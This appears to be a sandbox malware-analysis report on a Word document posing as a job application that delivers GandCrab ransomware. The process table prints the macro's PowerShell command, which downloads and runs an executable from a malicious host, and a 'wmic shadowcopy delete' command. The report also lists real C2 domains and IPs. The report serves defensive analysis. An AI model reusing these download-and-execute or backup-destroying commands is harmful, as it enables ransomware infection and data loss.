File name: | Bewerbung_Lena_Schwarz.doc |
Full analysis: | https://app.any.run/tasks/e72d8266-16ba-4cef-a7c5-98c779c4604a |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | December 18, 2018, 08:03:24 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | E9CE01FB0F565A95B8BF66A0FA32D11B |
SHA1: | 5B9B714AF457F7813BAAAD07B85C2BB8D2AE51F2 |
SHA256: | A75EF9B9FE8F637EEF6348F2F3AAB7F635FC0B64F383F49B06D84B54121A7A17 |
SSDEEP: | 1536:SYzOtUwRhX/i2nR3BxHlqKOfLK8eps7B7gClU6ragbn7JJJUJJJPjGYAGDKJJJJo:F0UqX/icFBBYfWJsdLragb7JJJUJJJPL |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
Description: | - |
---|---|
Creator: | User |
Subject: | - |
Title: | - |
ModifyDate: | 2018:12:18 05:50:00Z |
---|---|
CreateDate: | 2018:12:18 05:42:00Z |
RevisionNumber: | 2 |
LastModifiedBy: | User |
Keywords: | - |
AppVersion: | 16 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 1 |
LinksUpToDate: | No |
Company: | - |
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 1 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
Template: | summerjam |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1511 |
ZipCompressedSize: | 404 |
ZipCRC: | 0x23cbfb46 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3280 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Bewerbung_Lena_Schwarz.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3348 | cmd /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','%temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start %temp%\ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3776 | powErshEll (New-Object System.Net.WebClient).DownloadFile('http://topwarenhub.top/summerjam.exe','C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe');start C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2448 | "C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe" | C:\Users\admin\AppData\Local\Temp\ctftvkegqqyvcgmqcrbbttznbxrqj.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM | ||||
3968 | "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete | C:\Windows\system32\wbem\wmic.exe | — | ctftvkegqqyvcgmqcrbbttznbxrqj.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147749908 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3532 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3264 | C:\Windows\system32\DllHost.exe /Processid:{4D111E08-CBF7-4F12-A926-2C7920AF52FC} | C:\Windows\system32\DllHost.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: COM Surrogate Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2376 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\AADIBVT-DECRYPT.txt | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8B7D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0617B4C.png | — | |
MD5:— | SHA256:— | |||
3776 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E3U0PEQ3PAC177DB7JPO.temp | — | |
MD5:— | SHA256:— | |||
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | — | |
MD5:— | SHA256:— | |||
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C4CDEA1A-446A-445F-BA69-DAB98D7F756F}.tmp | binary | |
MD5:32A214AA6F5C0C005379DB477169E1CD | SHA256:9FBA5E06E6594CFCD596C498F0283AF4B06BBE25353CBD53EDCD561BAFBA6A4A | |||
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4E237B48-06FC-47CF-9681-DDB7C049A5F3}.tmp | smt | |
MD5:0AA5DB1388373EF0B3425E65C7C2A01F | SHA256:C70EAED267AA52C30D6209DBCC91602CC754887C8C53034405CC1EBEF04FA402 | |||
3776 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\AADIBVT-DECRYPT.txt | text | |
MD5:F12313658A868B2113A23F91C95CBBC2 | SHA256:F3806A6010FABFEEF4D6A4C6F6E2EB688FAA347F3B0A55CAE9EDD2D35E2594C4 | |||
3280 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$werbung_Lena_Schwarz.doc | pgc | |
MD5:14DD569DA6EB4450EFAD661DE8E4C881 | SHA256:A90D5AF739E54AF3DDFB86EBF226B52BD15DD214170FED547A100D0CCD8221A5 | |||
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | C:\Users\admin\AppData\AADIBVT-DECRYPT.txt | text | |
MD5:F12313658A868B2113A23F91C95CBBC2 | SHA256:F3806A6010FABFEEF4D6A4C6F6E2EB688FAA347F3B0A55CAE9EDD2D35E2594C4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | — | 212.59.186.61:80 | http://www.hotelweisshorn.com/ | CH | — | — | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 83.138.82.107:80 | http://www.swisswellness.com/ | DE | — | — | whitelisted |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | — | 78.46.77.98:80 | http://www.2mmotorsport.biz/ | DE | — | — | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 302 | 192.185.159.253:80 | http://www.pizcam.com/ | US | — | — | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 83.166.138.7:80 | http://www.whitepod.com/ | CH | — | — | whitelisted |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 104.24.22.22:80 | http://www.belvedere-locarno.com/ | US | — | — | shared |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | POST | — | 217.26.53.161:80 | http://www.haargenau.biz/static/graphic/daessees.bmp | CH | — | — | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | — | 217.26.53.37:80 | http://www.hrk-ramoz.com/ | CH | — | — | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 301 | 80.244.187.247:80 | http://www.hotelfarinet.com/ | GB | — | — | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | GET | 200 | 136.243.13.215:80 | http://www.holzbock.biz/ | DE | html | 1.78 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 78.46.77.98:443 | www.2mmotorsport.biz | Hetzner Online GmbH | DE | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 192.185.159.253:80 | www.pizcam.com | CyrusOne LLC | US | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 74.220.215.73:80 | www.bizziniinfissi.com | Unified Layer | US | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 138.201.162.99:80 | www.fliptray.biz | Hetzner Online GmbH | DE | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 83.138.82.107:80 | www.swisswellness.com | hostNET Medien GmbH | DE | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 212.59.186.61:80 | www.hotelweisshorn.com | green.ch AG | CH | malicious |
3776 | powershell.exe | 94.96.135.211:80 | topwarenhub.top | Saudi Telecom Company JSC | SA | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 192.185.159.253:443 | www.pizcam.com | CyrusOne LLC | US | malicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 136.243.13.215:80 | www.holzbock.biz | Hetzner Online GmbH | DE | suspicious |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | 83.166.138.7:443 | www.whitepod.com | Infomaniak Network SA | CH | malicious |
Domain | IP | Reputation |
---|---|---|
topwarenhub.top |
| malicious |
www.2mmotorsport.biz |
| unknown |
www.haargenau.biz |
| unknown |
www.bizziniinfissi.com |
| malicious |
dns.msftncsi.com |
| shared |
www.holzbock.biz |
| unknown |
www.fliptray.biz |
| malicious |
www.pizcam.com |
| unknown |
www.swisswellness.com |
| whitelisted |
www.hotelweisshorn.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
3776 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
3776 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3776 | powershell.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
3776 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3776 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3776 | powershell.exe | Misc activity | ET INFO Possible EXE Download From Suspicious TLD |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | A Network Trojan was detected | ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | A Network Trojan was detected | MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity |
2448 | ctftvkegqqyvcgmqcrbbttznbxrqj.exe | A Network Trojan was detected | MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity |